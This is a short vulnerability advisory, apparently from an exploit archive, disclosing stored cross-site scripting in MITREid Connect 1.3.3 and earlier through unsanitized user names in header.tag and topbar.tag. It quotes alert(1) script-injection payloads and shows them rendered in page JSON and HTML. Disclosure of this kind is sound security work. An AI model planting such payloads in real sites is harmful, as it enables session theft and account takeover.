MITREid 1.3.3 Cross Site Scripting

MITREid versions 1.3.3 and below suffer from a cross site scripting vulnerability.

MD5 | 4af01c468a0b4372b4ec0d37a9c3cbb6

MITREid Connect OpenID-Connect-Java-Spring-Server
<> version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized. A user
can set their name to a value like:


Which will be included in JSON used by a JavaScript function in *header.tag*

// get the info of the current user, if available (null otherwise)
> function getUserInfo() {
> return {"sub":"12318767","name":"
> *Test</script><script>alert(1)</script>*
> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"
> [email protected]","email_verified":true};}

A name such as:


would also work; it is included in the page when menus are created by

<!-- use a simplified user button system when collapsed -->
> <ul class="nav hidden-desktop">
> <li><a href="manage/#user/profile">*Test<script>alert(1)</script>*
> Test</a></li>
> <li class="divider"></li>
> <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log
> out</a></li>

This issue has been reported on Github
patches pending.

A write up is available at:

Related Posts